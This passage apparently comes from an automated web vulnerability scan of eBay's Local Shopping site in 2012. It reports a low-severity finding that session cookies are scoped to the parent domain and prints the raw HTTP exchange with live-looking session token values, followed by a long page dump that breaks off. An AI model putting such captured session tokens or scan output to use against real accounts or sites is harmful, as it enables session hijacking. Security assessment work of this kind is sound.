   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event) { this.setData({"placeholder":"Enter valid U.S ZIP Code","jsId":"merFs","trkId":"p5791.m1","data":{"numResults":0,"localPickupModel":null,"errorMap":null,"noProductFound":false,"location":"75217","deals":[{"highPrice":null,"highPriceValue":null,"productId":18989810,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=18989810&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/013/976/666/200/13976703_17237666_200.jpg","lowPrice":{"valueInMinorUnits":1699,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":16990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Call It Spring.. 'Geniesse' Handbag","offerIds":"13976703","numLocalStore":1,"lowPriceValue":"$16.99","miloProductOfferModel":[{"merchantTitle":"JCPenney","merchantId":6740,"linkUrl":null,"location":{"merchantName":"JCPenney","latitude":32.605204,"merchantLogoUrl":"http://milo.com/images/stores/6740.jpg","longitude":-96.929276},"RTPalUrl":null,"price":{"valueInMinorUnits":1699,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":16990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/6740.png"}],"ratingNode":null},{"highPrice":null,"highPriceValue":null,"productId":19880000,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=19880000&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/014/742/102/200/14742881_19976102_200.jpg","lowPrice":{"valueInMinorUnits":5999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":59990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Faux Chinchilla Clutch","offerIds":"14742881","numLocalStore":1,"lowPriceValue":"$59.99","miloProductOfferModel":[{"merchantTitle":"Ann Taylor","merchantId":12842,"linkUrl":null,"location":{"merchantName":"Ann Taylor","latitude":33.027709,"merchantLogoUrl":"http://milo.com/images/stores/12842.jpg","longitude":-96.831243},"RTPalUrl":null,"price":{"valueInMinorUnits":5999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":59990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/12842.png"}],"ratingNode":null},{"highPrice":null,"highPriceValue":null,"productId":8276145,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=8276145&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/009/390/580/200/9390671_11239580_200.jpg","lowPrice":{"valueInMinorUnits":7999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":79990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Camryn Metallic Raffia Tote","offerIds":"9390671","numLocalStore":1,"lowPriceValue":"$79.99","miloProductOfferModel":[{"merchantTitle":"Johnston & Murphy","merchantId":12847,"linkUrl":null,"location":{"merchantName":"Johnston & Murphy","latitude":32.770304,"merchantLogoUrl":"http://milo.com/images/stores/12847.jpg","longitude":-96.800606},"RTPalUrl":null,"price":{"valueInMinorUnits":7999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":79990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/12847.png"}],"ratingNode":null}],"title":"","trkId":null,"localLandingLeftNavModel":null,"numOfResults":0,"topProducts":[{"highPrice":{"valueInMinorUnits":3999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":39990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"highPriceValue":"$39.99","productId":1097963,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":344,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":8,"id":8,"name":"4-5","integer":8},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=1097963&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/001/632/630/200/1632049_249630_200.jpg","lowPrice":{"valueInMinorUnits":1996,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19960000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":344,"title":"Call of Duty Modern Warfare 2 (PS3)","offerIds":"1107669,1549941,1557361,1632049","numLocalStore":4,"lowPriceValue":"$19.96","miloProductOfferModel":[{"merchantTitle":"Best Buy","merchantId":1779,"linkUrl":null,"location":{"merchantName":"Best Buy","latitude":32.931615,"merchantLogoUrl":"http://milo.com/images/stores/1779.jpg","longitude":-96.821136},"RTPalUrl":null,"price":{"valueInMinorUnits":3999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":39990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png"},{"merchantTitle":"Fry's Electronics","merchantId":3040,"linkUrl":null,"location":{"merchantName":"Fry's Electronics","latitude":33.008115,"merchantLogoUrl":"http://milo.com/images/stores/3040.jpg","longitude":-96.70534},"RTPalUrl":null,"price":{"valueInMinorUnits":1996,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19960000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3040.png"},{"merchantTitle":"Micro Center","merchantId":3713,"linkUrl":null,"location":{"merchantName":"Micro Center","latitude":32.938058,"merchantLogoUrl":"http://milo.com/images/stores/3713.jpg","longitude":-96.748542},"RTPalUrl":null,"price":{"valueInMinorUnits":3999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":39990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3713.png"},{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":3999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":39990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 60.75px\"><\/span>\n<\/span><span class=\"revCnt\">(344)<\/span>"}],"ticketModel":null},"zipcode":"75217"}); },vjo.ebay.local.localmap.LocalMap);_d.add('body','load',function(event) { this.init({"leftFsPages":6,"jsId":"localinfoFs","content":true,"rightFs":false,"rightFsPages":0}); },vjo.ebay.local.localinfo.LocalInfo);_d.add('body','load',function(event) { this.init("75217", "1"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-dcp,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac8a3dda-->

2.5. http://local.ebay.com/Netsparkercafcc364b74d42e78e11240bb32f4487  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /Netsparkercafcc364b74d42e78e11240bb32f4487

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Netsparkercafcc364b74d42e78e11240bb32f4487 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Cookie: ebay=%5Ecv%3D15555%5E; s=CgAD4ACBPBpOCYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjXl/Jd2; nonsession=CgADKACBYa0OCYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjUAywABTwVJCjI5rfuQ
Accept-Encoding: gzip, deflate
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac8a4617
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: s=CgAD4ACBPBpOeYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjWLGFbR; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OeYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjUAywABTwVJJjOEQ+QK; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:30 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 35690
Date: Thu, 05 Jan 2012 06:24:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - Local</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;} .srpi {width:435px;} .zipcode{zoom:1;height:100%;z-index:111} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325720851249" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325720851249;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AHtMRZjo*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div class="cont" style="margin-left:0">


<div class="srpbx" id="srpbx">
   <div class="srpbxLft">
   </div>

   <div style="padding:10px 10px 10px 25px"><span style="font-weight:bold;font-size:24px;color:#2F50BC;">Local Shopping <sup style="font-size:11px;color:#000">Beta</sup></span>
       <div style="font:normal small arial;padding-top:5px">Need it fast? Find what you're looking for in a store near you.</div>
   </div>
<!--    <div>
        <div class="srplb">Search locally to find the best deals in your area... <span class="rt">Right now, on eBay</span></div>
   </div>
-->    
   <div style="margin-left:-72px;z-index:5;position:relative;">
       <form action="/local/localsch.html" method="get" id="schfrm" onsubmit="return vjo.ebay.local.localmap.LocalMap.onSubmit();">
           <div class="fm-cnt">
               <div class="srps">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi">
                   <input type="text" id="searchbox" name="_nkw" placeholder="Search locally " autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               <div>                    
                       <span class="near-txt">Near</span><input class="zipcode" autocomplete="off" name="_location" id="_location" value="75217" size="50" title="Enter Location" tabindex="3" placeholder="Enter valid U.S ZIP Code">
                       <div id="autocomplete" class="autocomplete"></div>                        
                   
                       <a href="javascript:;" title="Change Location" type="change" id="loc_change" tabindex="4">Change</a>
                   <span id="err" style="display:none;color:red">Could not find the location.</span>
                   &nbsp;<a href="javascript:;" id="resetloc" style="">| <span>Current Location</span></a>
                   
                   <div class="clr"></div>
               </div>
               <div class="clr"></div>
           </div>
           
           <fontT><div class="srpMar"><b></b><span>Over 50,000 local stores including:</span>
           <span class="ff">
               <span class="fs" id="merchantFs">
           <span class="preS"><a class="pre db" id="pre" href="javascript:;" tabindex="6"></a></span>
       <div class="cntWrap" id="cntWrap1" style="width:252px;overflow:hidden">
    <div class="cnt" id="cnt1" style="width:10000px"><img title="Fry's Electronics" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3040.png"><img title="Best Buy" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1779.png"><img title="Sears" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1609.png"><img title="Micro Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3713.png"><img title="Target" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1792.png"><img title="Staples" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1825.png"><img title="Armani Exchange" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12863.png"><img title="Loft" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12843.png"><img title="Sunglass Hut" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12850.png"><img title="JCPenney" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/6740.png"><img title="Nordstrom" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10390.png"><img title="Ikea" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/8615.png"><img title="Golf Smith" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5461.png"><img title="Office Depot" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1848.png"><img title="Toys R Us" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5893.png"><img title="RadioShack" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1829.png"><img title="Container Store" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12861.png"><img title="Guitar Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/7374.png"><img title="Macy's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10617.png"><img title="GameStop" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/9386.png"><img title="Lowe's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/4483.png">
    </div>
       </div><span class="nextS"><a class="next enab " id="next" href="javascript:;" tabindex="7"></a></span>
       <div class="clr"></div>
               </span>
           </span>
           </div><fontT>
           <input type="hidden" id="_fpos" name="_fpos" value="75217">
           
               <input type="hidden" id="_trksid" name="_trksid" value="p5791.m1">
           
       </form>
   </div>
   <input type="hidden" id="zip" value="75217">
   
   <div style="position:absolute;right:25px;top:30px;color:#333;display:none;" id="loading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif" /></div>
   
   
</div>    

<div id="map_canvas" class="mainmap"></div>

</div></div><div id="linfo" class="loc-info">    
   
   <div>
                               <div class="loc-ttl">
                                   <fontt><a id="ecArr" href="javascript:;"><b></b></a></fontt>
                               </div>
                               <div style="position: absolute; font-size: 10px; right: 10px;">Pricing &amp; inventory <a href="/local/disclaimer.html" target="blank">subject to Terms</a></div>
                               <div id="cntWrapper" class="loc-cntW">
                                   <table id="cntDiv" class="loc-cnt" style="width: 100%;table-layout:fixed" cellpadding="0" cellspacing="0">
                                   <tbody><tr>
                                   
                                       <td class="loc-tkt" align='center' >
                                           <div class="loc-cntTtl" >Popular Products</div>
                                           <div id="fsWrp1" class="loc-fsW" style="min-width:872px;max-width:1136px;" >
                                               <a id="fsLa1" href="javascript:;" class="loc-fsA loc-fsLd"></a>
                                               <div class="rImg">
                                                   <div id="fsCnt1" class="loc-fsCnt" style="min-width:872px;max-width:1136px;" >
                                                       <div id="fsDiv1" class="loc-fsItmW">
                                                       <div class="dealWrap" id="920956" coords="32.874857,-96.76977,5893,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/000/899/987/200/899394_13232987_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=920956&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Elefun - The Butterfly Catchin' Game'>Elefun - The Butterfly Catchin' Game</a>
</div><div class="price"><span class="price">$19.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="9301156" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/453/045/200/10453722_13347045_200.jpg" />
<div class="rCnt"><div class="ttl">
